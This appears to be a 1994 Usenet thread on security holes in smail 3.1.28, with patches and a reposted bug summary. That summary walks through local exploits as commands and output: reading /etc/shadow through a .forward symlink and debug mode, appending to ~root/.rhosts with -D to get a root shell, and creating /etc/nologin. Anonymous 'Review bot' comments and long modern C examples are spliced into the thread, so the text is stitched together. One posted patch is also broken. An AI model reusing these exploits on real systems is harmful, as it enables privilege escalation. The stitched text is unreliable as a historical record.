patch need of smail 3.1.28

Post by h.. » Fri, 04 Nov 1994 18:55:24



Hi,
        Somebody told me that a big hole was found in smail 3.1.28 lately.
        Can anybody tell me if it is true? I'd appreciate more detail :)
        And where could I find a patch for it?
        Thanks :)


Post by Tilman Schmi » Sat, 05 Nov 1994 19:22:59




>    Somebody told me that a big hole was found in smail 3.1.28 lately.
>    Can anybody tell me if it is true? I'd appreciate more detail :)
>    And where could I find a patch for it?
>    Thanks :)

You surely mean the good old smtp_debug flag which allows people
to connect to smail by telnetting the SMTP port and do evil deeds
with debug commands.  Just put the line

-smtp_debug

in your smail config file and you're safe.  (Against that
particular attack, that is.  ;-)

HTH
Tilman

--
Tilman Schmidt                              Phone:  +49 221 8299 275
Sema Group Deutschland GmbH                 Fax:    +49 221 8299 266



Post by Christopher Samu » Wed, 09 Nov 1994 23:22:00




>    Somebody told me that a big hole was found in smail 3.1.28 lately.
>    Can anybody tell me if it is true? I'd appreciate more detail :)
>    And where could I find a patch for it?

You could always try:

        ftp://src.doc.ic.ac.uk/packages/mail/smail/smail-3.1.29.tar.gz

There's a Linux binary distribution for it, as well as the documentation,
in that directory.

good luck!
Chris
--

 N-115, Defence Research Agency,  St Andrews Road, Great Malvern, England, UK


Post by Nick Hillia » Mon, 07 Nov 1994 00:05:01



: >  Somebody told me that a big hole was found in smail 3.1.28 lately.
: >  Can anybody tell me if it is true? I'd appreciate more detail :)
: >  And where could I find a patch for it?
: >  Thanks :)

: You surely mean the good old smtp_debug flag which allows people
: to connect to smail by telnetting the SMTP port and do evil deeds
: with debug commands.  Just put the line

: -smtp_debug

: in your smail config file and you're safe.  (Against that
: particular attack, that is.  ;-)

There are no known security holes in smail which _inherently_ involve
smtp_debug.  There is one security hole which can be fixed by applying the
patch below.  If you are running smail on linux, you need to define SETEUID
in the HAVE section of the configuration file.  Otherwise, smail does not
handle mail forwarding in a secure manner.

diff -rc smail-3.1.28.old/src/main.c smail-3.1.28/src/main.c
*** smail-3.1.28.old/src/main.c Fri Nov  4 00:04:30 1994
--- smail-3.1.28/src/main.c     Fri Nov  4 00:04:59 1994
***************
*** 335,341 ****
      if (config_file != save_config_file || arg_second_config_file ||
        arg_director_file || arg_router_file || arg_transport_file ||
        arg_qualify_file || arg_retry_file || arg_smail_lib_dir ||
!       arg_alias_file || operation_mode == REBUILD_ALIASES)
      {
        /*
         * a config_file was set, or unset from the command args
--- 335,341 ----
      if (config_file != save_config_file || arg_second_config_file ||
        arg_director_file || arg_router_file || arg_transport_file ||
        arg_qualify_file || arg_retry_file || arg_smail_lib_dir ||
!       arg_alias_file || arg_debug_file || operation_mode == REBUILD_ALIASES)
      {
        /*
         * a config_file was set, or unset from the command args
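Review bot: with `arg_debug_file ||` added to this condition, the comment that opens the branch (`a config_file was set, or unset from the command args`) no longer describes everything that enters it; extend it to say that a -D debug file is deliberately treated like an untrusted command-line override, so the next reader does not drop the term as unrelated. The SETEUID requirement stated above the patch is a HAVE setting that this hunk cannot check, so it is worth a note next to the condition as well: by the post's own description, the hunk alone does not make forwarding safe on a build without it.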

Nick
--
Thought for the day:
"Don't worry about people stealing your ideas.  If your ideas are any
good, you'll have to ram them down people's throats."
                -- Howard Aiken


Post by Christopher Ellwo » Wed, 16 Nov 1994 14:59:43


In comp.security.unix, Tilman Schmidt said...

>In article <39ac2d$...@debbie.cc.nctu.edu.tw>,
> <h...@ccserv.cc.nccu.edu.tw> wrote:
>>        Somebody told me that a big hole was found in smail 3.1.28 lately.
>>        Can anybody tell me if it is true? I'd appreciate more detail :)
>>        And where could I find a patch for it?
>>        Thanks :)

>You surely mean the good old smtp_debug flag which allows people
>to connect to smail by telnetting the SMTP port and do evil deeds
>with debug commands.  Just put the line

>-smtp_debug

>in your smail config file and you're safe.  (Against that
>particular attack, that is.  ;-)

Well, not quite.  The -smtp_debug prevents one method of exploiting
that bug, but there is another method that works just as well.

I've appended a summary of three smail bugs that someone posted a while
back.  Note that it's likely that there are more bugs in smail than these
three.  Also note that I take no responsibility for anything contained in
this message.  Use and abuse at your own risk.

- Chris

-----
***
Bug #1
***

SYNOPSIS
--------

Use of ~/.forward and debug lets a local user read any file on the system.

EXAMPLE OF EXPLOITATION
-----------------------

user@psyops ~> ln -s /etc/shadow .forward
user@psyops ~> ls -la .forward
lrwxrwxrwx   1 user     users          11 Sep  5 12:08 .forward -> /etc/shadow

user@psyops ~> telnet localhost smtp

Trying 127.0.0.1...
Connected to localhost
Escape character is '^]'.
220 psyops.warez.mil Smail3.1.28.1 ready for mail on Mon, 5 Sep 94 12:10 PDT
debug 20
250 Debugging level: 20
expn user

[lots of text]

expand_string(~/.forward, /home/user, user) called
expand_string returns /home/user/.forward
dtd_forwardfile:  opening forward file /home/user/.forward

[more text]

read 890 bytes
director dotforward: matched user, forwarded to
root:e.fmSewuS32sfeVdsjk/Ewef:8000:0:99999:7:::
bin:*:8000:0:99999:7:::
daemon:*:8000:0:99999:7:::
nobody:*:8000:0:99999:7:::
user:e74fds.Sfdsioa8e2dsskDSx:8000:0:99999:7:::
[....]

process_field: entry
We have a group
We have a group
process_field: error: recursive address group
550 user ... not matched
quit
221 psyops.warez.mil closing connection
Connection closed by foreign host.
---------------

Contrary to popular belief, adding -smtp_debug to your smail config file
will not prevent this bug from occurring.  It will just prevent exploitation
via the smtp port.

We can just do this....

----------
user@psyops ~> smail -bs -v20
expand_string($primary_name Smail$version ready for mail on $date,(null),(null)) called
expand_string returns psyops.warez.mil Smail3.1.28.1 ready for mail on Mon, 5 Sep 94 12:15 PDT
220 psyops.warez.mil Smail3.1.28.1 ready for mail on Mon, 5 Sep 94 12:15 PDT
expn user

[same text as before]

expand_string(~/.forward, /home/user, user) called
expand_string returns /home/user/.forward
dtd_forwardfile:  opening forward file /home/user/.forward

[more of same text]

read 890 bytes
director dotforward: matched user, forwarded to
root:e.fmSewuS32sfeVdsjk/Ewef:8000:0:99999:7:::
bin:*:8000:0:99999:7:::
daemon:*:8000:0:99999:7:::
nobody:*:8000:0:99999:7:::
user:e74fds.Sfdsioa8e2dsskDSx:8000:0:99999:7:::
[.....]

process_field: entry
We have a group
We have a group
process_field: error: recursive address group
550 user ... not matched
quit
221 psyops.warez.mil closing connection

----------

To fix this, you should get rid of the -d and -v options for smail
as well as adding -smtp_debug to your config file.

***
Bug #2
***

SYNOPSIS
--------

Smail called with the -D flag will allow you to create and append to any
file on the system.

EXAMPLE OF EXPLOITATION
-----------------------
user@psyops ~> cat > ~/.forward

localhost user
^D
user@psyops ~> smail -bs -D ~root/.rhosts -v20
220 psyops.warez.mil Smail3.1.28.1 ready for mail on Mon, 5 Sep 94 12:23 PDT
expn user
250 user
quit
221 psyops.warez.mil closing connection

user@psyops ~> rsh -l root localhost tcsh\ -i
Warning: no access to tty (Bad file number).
Thus no job control in this shell.
# id
uid=0(root) gid=0(root)

--------------

Patch this by removing the -D option from smail.

I received the following patch recently.  I haven't tested it, so use
at your own risk.

*** Omain.c     Wed Mar 11 12:33:18 1993
--- main.c      Wed Mar 11 12:59:54 1993
***************
*** 436,458 ****
      }

-     /*
-      * change error file to debugging file from -D option, if any
-      */
-
-     if (arg_debug_file) {
-       new_errfile = fopen(arg_debug_file, "a");
-       if (new_errfile == NULL) {
-           write_log(LOG_TTY, "Warning: Cannot open debug file %s: %s\n",
-                     arg_debug_file, strerrno(errno));
-           arg_debug_file = NULL;
-       } else {
-           errfile = new_errfile;
-           fprintf(errfile, "\n%s: Debugging started: pid=%ld\n\n",
-                   program, (long)getpid());
-       }
-     }

      /*
       * read in the transport, router and director files, if needed
       *
       * NOTE: if queue_only is FALSE and mode is DELIVER_MAIL,
--- 436,441 ----
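Review bot: the block removed here called plain `fopen(arg_debug_file, "a")` at this point in main(), i.e. before the setuid/setgid handling that the re-inserted copy's comment refers to, which is how any file named with -D could be appended to; removing it is correct, but the deletion only makes sense together with the second hunk, so apply and review both hunks as one change rather than accepting this one alone.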
***************
*** 525,530 ****
--- 508,537 ----
      if (prog_euid != REQUIRED_EUID)
            queue_only = TRUE;
  #endif

+     /*
+      * change error file to debugging file from -D option, if any
+      *
+      * JMJ: Change location of this fragment to below the setuid/setgid
+      *      calls to allow for use of fopen_as_user() instead of just
+      *      fopen().
+      *
+      *      Side effect: -D now requires full pathname to debug file
+      */
+
+     if (arg_debug_file) {
+       new_errfile = fopen_as_user(arg_debug_file, "a", 1, real_uid,
+           prog_egid, 0600);
+           write_log(LOG_TTY, "Warning: Cannot open debug file %s: %s\n",
+                     arg_debug_file, strerrno(errno));
+           arg_debug_file = NULL;
+       } else {
+           errfile = new_errfile;
+           fprintf(errfile, "\n%s: Debugging started: pid=%ld\n\n",
+                   program, (long)getpid());
+       }
+     }

      /*
       * error processing can be other than TERMINAL only for
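Review bot: the re-inserted block is missing the `if (new_errfile == NULL) {` line between `new_errfile = fopen_as_user(...)` and `write_log(LOG_TTY, "Warning: Cannot open debug file %s: %s\n", ...)`, so as posted the warning and `arg_debug_file = NULL;` run unconditionally and the following `} else {` has no opening `if`; it will not compile until that line is restored. The JMJ comment also notes that -D now requires a full pathname only as a side effect of the relocation; better to test for a leading `/` explicitly and refuse anything else before the open than to rely on that side effect.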
--

***
Bug #3
***

SYNOPSIS
--------

Files specified in ~/.forward can be created in any directory, regardless
of its permissions.  (File is still owned by mailbox owner, however.)

EXAMPLE OF EXPLOITATION
-----------------------

user@psyops ~> echo "/etc/nologin" > ~/.forward
user@psyops ~> mail -r root user < /dev/null
user@psyops ~> echo "Site shutdown due to smail lameness" >!  /etc/nologin
user@psyops ~> rlogin localhost
Site shutdown due to smail lameness
rlogin: connection closed.

---------

Plug up this hole by adding 'check_path' to the following part of
your /usr/lib/smail/transports file:

---
[...]
# file - deliver mail to files
#
# This is used implicitly when smail encounters addresses which begin with
# a slash or squiggle character, such as "/usr/info/list_messages" or
# perhaps "~/Mail/inbox".
file:   driver = appendfile,
        return_path, local, from, unix_from_hack;

        file = $user,                   # file is taken from address
        append_as_user,                 # use user-id associated with address
        expand_user,                    # expand ~ and $ within address
        check_path,   #<--add this line
        suffix = "\n",
        mode = 0644
[...]
---
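Bug #1 above comes from the mailer opening whatever ~/.forward points at while still holding its own privileges. The following is an added example, not smail's code and not from any poster in this thread, showing the check a setuid mailer can apply before reading a user-controlled file: inspect with lstat so a symlink is seen as a symlink, require a regular file owned by the mailbox owner with a single link and no group/world write bit, open with O_NOFOLLOW, and confirm via fstat that the descriptor refers to the same inode that passed the check. Function names, the scratch directory under /tmp and the sample forward entry are my own assumptions.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Policy applied to the metadata lstat(2) returns for a ~/.forward before a
 * privileged mailer reads it. Pure function (no filesystem access) so it can
 * be tested with constructed values. Returns 1 if safe to read, 0 otherwise. */
int forward_meta_ok(mode_t mode, uid_t st_uid, nlink_t nlink, uid_t owner)
{
    if (S_ISLNK(mode))              return 0; /* a symlink, e.g. to /etc/shadow (Bug #1) */
    if (!S_ISREG(mode))             return 0; /* no directories, fifos, devices */
    if (st_uid != owner)            return 0; /* must belong to the mailbox owner */
    if (nlink != 1)                 return 0; /* hard link into another user's file */
    if (mode & (S_IWGRP | S_IWOTH)) return 0; /* others could plant addresses */
    return 1;
}

/* Inspect with lstat (so a symlink is seen as a symlink, not as its target),
 * open with O_NOFOLLOW, then fstat the open descriptor and confirm it is the
 * same inode that passed the check, so a swap between check and open is
 * caught. Returns a read-only fd, or -1 with errno set. */
int open_forward_file(const char *path, uid_t owner)
{
    struct stat before, after;
    int fd;

    if (lstat(path, &before) != 0)
        return -1;
    if (!forward_meta_ok(before.st_mode, before.st_uid, before.st_nlink, owner)) {
        errno = EPERM;
        return -1;
    }
    fd = open(path, O_RDONLY | O_NOFOLLOW | O_NOCTTY);
    if (fd < 0)
        return -1;
    if (fstat(fd, &after) != 0 ||
        after.st_dev != before.st_dev || after.st_ino != before.st_ino ||
        !forward_meta_ok(after.st_mode, after.st_uid, after.st_nlink, owner)) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Demonstration on a scratch directory with constructed inputs: a plain
 * .forward owned by the caller is accepted, a symlink to another file is
 * refused. Returns 0 when both outcomes are as expected, else a step code. */
int demo_forward_check(void)
{
    char dir[] = "/tmp/fwdchkXXXXXX";               /* assumed scratch location */
    char plain[300], target[300], lnk[300];
    const char *entry = "user@example.invalid\n";   /* constructed forward entry */
    int fd, rc = 0;

    if (mkdtemp(dir) == NULL)
        return 1;
    snprintf(plain, sizeof plain, "%s/dotforward", dir);
    snprintf(target, sizeof target, "%s/secret", dir);
    snprintf(lnk, sizeof lnk, "%s/linked_forward", dir);

    fd = open(plain, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0 || write(fd, entry, strlen(entry)) < 0)
        rc = 2;
    if (fd >= 0) close(fd);
    fd = open(target, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0) rc = 3; else close(fd);
    if (symlink(target, lnk) != 0)
        rc = 4;

    if (rc == 0) {
        fd = open_forward_file(plain, getuid());        /* expected: accepted */
        if (fd < 0) rc = 5; else close(fd);
        if (rc == 0 && open_forward_file(lnk, getuid()) != -1)
            rc = 6;                                     /* expected: refused */
    }
    unlink(lnk); unlink(target); unlink(plain); rmdir(dir);
    return rc;
}

int main(void)
{
    int rc = demo_forward_check();
    printf("forward-file check: %s (rc=%d)\n", rc == 0 ? "ok" : "FAILED", rc);
    return rc;
}
```

The policy function is kept separate from the filesystem calls so the rules can be reviewed and unit-tested on their own; the dev/ino comparison after the open is what turns a check-then-open sequence into something an attacker cannot race by swapping the file in between.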


Post by Robert Iva » Thu, 10 Nov 1994 01:42:24




   > Somebody told me that a big hole was found in smail 3.1.28 lately.
   > Can anybody tell me if it is true? I'd appreciate more detail :)
   > And where could I find a patch for it?
   > Thanks :)

   You surely mean the good old smtp_debug flag which allows people
   to connect to smail by telnetting the SMTP port and do evil deeds
   with debug commands.  Just put the line

   -smtp_debug

   in your smail config file and you're safe.  (Against that
   particular attack, that is.  ;-)

-smtp_debug shields only from the telnet attack. It doesn't shield you
against direct attack. And this one is the least serious. 3.1.28 has
another bug that enables a normal user to change any file on the system.
~root/.rhosts for example. I don't know where the patch is, I just
know that it is quite serious. Exploit scripts have been posted to
the bugtraq list.

Robert
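The bug Robert describes, and Bug #2 in Christopher Ellwood's post, is the setuid mailer opening a file named on its command line (-D) while still privileged. The fopen_as_user patch in that post addresses it by opening the file as the invoking user. As an added example, not smail's code and not from any poster, here is that pattern written out in full, including the NULL check the posted patch lost and an explicit rule that the path must be absolute: the effective uid is lowered to the real uid only around the open, a symlink at the path is refused with O_NOFOLLOW, and a pre-existing file not owned by the real user is refused after fstat. Function names and the scratch paths under /tmp are my own assumptions.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open a user-named file for append with the real user's privileges.
 * The effective uid is lowered to real_uid only around the open(2) and
 * restored afterwards; O_NOFOLLOW refuses a symlink placed at the path and
 * the fstat check refuses a pre-existing file the user does not own.
 * Returns a FILE* ready for writing, or NULL with errno set; the caller is
 * expected to log a warning and continue without the debug file. */
FILE *fopen_append_as_real_user(const char *path, uid_t real_uid)
{
    uid_t saved_euid = geteuid();
    struct stat st;
    int fd, saved_errno;
    FILE *fp;

    if (path == NULL || path[0] != '/') {  /* the patch's "full pathname" rule, made explicit */
        errno = EINVAL;
        return NULL;
    }
    if (seteuid(real_uid) != 0)            /* become the invoking user for the open */
        return NULL;
    fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW | O_NOCTTY, 0600);
    saved_errno = errno;
    if (seteuid(saved_euid) != 0) {        /* must regain privilege, otherwise bail out */
        if (fd >= 0) close(fd);
        errno = EPERM;
        return NULL;
    }
    if (fd < 0) {                          /* the NULL-check branch the posted patch dropped */
        errno = saved_errno;
        return NULL;
    }
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != real_uid) {
        close(fd);
        errno = EPERM;
        return NULL;
    }
    fp = fdopen(fd, "a");
    if (fp == NULL)
        close(fd);
    return fp;
}

/* Demonstration with constructed paths in a scratch directory: a new debug
 * file is created and written, a relative path and a symlink are refused.
 * Returns 0 when all outcomes match, else a step code. */
int demo_debug_open(void)
{
    char dir[] = "/tmp/dbgopnXXXXXX";                 /* assumed scratch location */
    char logf[300], other[300], lnk[300], buf[64];
    FILE *fp;
    int fd, rc = 0;

    if (mkdtemp(dir) == NULL)
        return 1;
    snprintf(logf, sizeof logf, "%s/debug.log", dir);
    snprintf(other, sizeof other, "%s/not-yours", dir);
    snprintf(lnk, sizeof lnk, "%s/debug.link", dir);

    fp = fopen_append_as_real_user(logf, getuid());    /* expected: works */
    if (fp == NULL) rc = 2;
    else { fprintf(fp, "Debugging started: pid=%ld\n", (long)getpid()); fclose(fp); }

    if (rc == 0 && fopen_append_as_real_user("debug.log", getuid()) != NULL)
        rc = 3;                                        /* expected: relative path refused */

    fd = open(other, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd >= 0) close(fd);
    if (rc == 0 && (fd < 0 || symlink(other, lnk) != 0))
        rc = 4;
    if (rc == 0 && fopen_append_as_real_user(lnk, getuid()) != NULL)
        rc = 5;                                        /* expected: symlink refused */

    if (rc == 0) {                                     /* confirm the line landed in the log */
        fp = fopen(logf, "r");
        if (fp == NULL || fgets(buf, sizeof buf, fp) == NULL ||
            strncmp(buf, "Debugging started", 17) != 0)
            rc = 6;
        if (fp) fclose(fp);
    }
    unlink(lnk); unlink(other); unlink(logf); rmdir(dir);
    return rc;
}

int main(void)
{
    int rc = demo_debug_open();
    printf("debug-file open as real user: %s (rc=%d)\n", rc == 0 ? "ok" : "FAILED", rc);
    return rc;
}
```

Run as an ordinary user the seteuid calls are no-ops and the demonstration still exercises the path, symlink and ownership rules; in a real setuid mailer the same function is what keeps a -D argument from ever being written with the mailer's privileges.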


Post by Lyndon Nerenbe » Sat, 19 Nov 1994 15:46:06


All (I believe) of the security holes mentioned here have been fixed in
the 3.1.29 release. It's available from ftp.uu.net and its mirrors ...

--lyndon